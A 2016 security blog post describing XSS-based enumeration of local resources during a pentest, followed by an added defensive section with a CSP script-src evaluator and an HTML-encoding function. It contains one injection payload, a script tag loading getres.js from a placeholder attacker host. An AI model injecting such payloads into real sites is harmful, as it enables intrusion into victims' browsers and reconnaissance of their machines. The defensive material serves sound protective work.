
Saturday, 10 September 2016

Local resource enumeration via XSS

You probably already know how to "Hack Intranet Websites from the Outside" (if not, google for Jeremiah Grossman and RSnake - you can start here - and read about some attacks from 2006 and 2007). ;) There you will find JavaScript used in much the same way as below:

During a recent webapp pentest I was asked to prepare a scenario of possible XSS exploitation. I decided to use an old technique (see Grossman and RSnake ;)) known as "portscan in JS". My change was that I checked for local resources rather than open ports. Results below:


If you use (as your XSS payload) something like:
<script src='http://your.box/getres.js'></script>
or just paste the code into the vulnerable form, you should be able to enumerate resources on the remote host. You can of course extend this further and further... but I will leave that to you as homework ;)
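From the defender's side, the payload above only works when the page may load scripts from an arbitrary origin and reflects input without encoding. The following is an added example, not code from the original post: a small `script-src` evaluator that shows why a Content-Security-Policy blocks `http://your.box/getres.js`, plus the output encoding that stops the tag from rendering at all. The policy string and the hostnames `app.example.com` and `cdn.example.org` are constructed for illustration.

```javascript
// Added example, not code from the original post. Evaluates a CSP script-src
// directive against a script URL and HTML-encodes untrusted input so the
// injected <script> tag is rendered as text. Hostnames are constructed.

const ENTITY = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#x2F;' };

// Encode untrusted input before reflecting it into an HTML body.
function htmlEncode(s) {
  return String(s).replace(/[&<>"'/]/g, (ch) => ENTITY[ch]);
}

// Parse "directive value value; directive value" into { directive: [values] }.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1).map((t) => t.toLowerCase());
  }
  return directives;
}

// Would a browser enforcing `header` on a page at `pageOrigin` load `scriptUrl`?
// Handles 'self', 'none', '*', scheme sources and [scheme://]host[:port] with a
// leading "*." wildcard. Nonces, hashes and 'unsafe-inline' never allow a URL.
function scriptSrcAllows(header, scriptUrl, pageOrigin) {
  const csp = parseCsp(header);
  const sources = csp['script-src'] ?? csp['default-src'];
  if (!sources) return true; // no directive covers scripts: anything loads
  const target = new URL(scriptUrl, pageOrigin);
  const page = new URL(pageOrigin);
  for (const src of sources) {
    if (src === "'none'") return false;
    if (src === "'self'") { if (target.origin === page.origin) return true; continue; }
    if (src.startsWith("'")) continue; // keyword, nonce or hash: not a URL whitelist
    if (src === '*') return true;
    if (/^[a-z][a-z0-9+.-]*:$/.test(src)) { if (target.protocol === src) return true; continue; }
    const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:/]+)(?::(\d+|\*))?$/.exec(src);
    if (!m) continue;
    const [, scheme, host, port] = m;
    // A schemeless host source matches the page's scheme or an upgrade to https.
    const schemeOk = scheme ? target.protocol === `${scheme}:`
      : target.protocol === page.protocol || target.protocol === 'https:';
    const hostOk = host.startsWith('*.') ? target.hostname.endsWith(host.slice(1)) : target.hostname === host;
    const portOk = port === '*' || (port ?? '') === target.port; // '' means the scheme's default port
    if (schemeOk && hostOk && portOk) return true;
  }
  return false;
}
```

With `script-src 'self' https://cdn.example.org` in place, the remote payload fails the policy check, and `htmlEncode` turns the tag into inert text when the input is reflected into the page body.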

The code is also available on my GitHub.

Cheers!
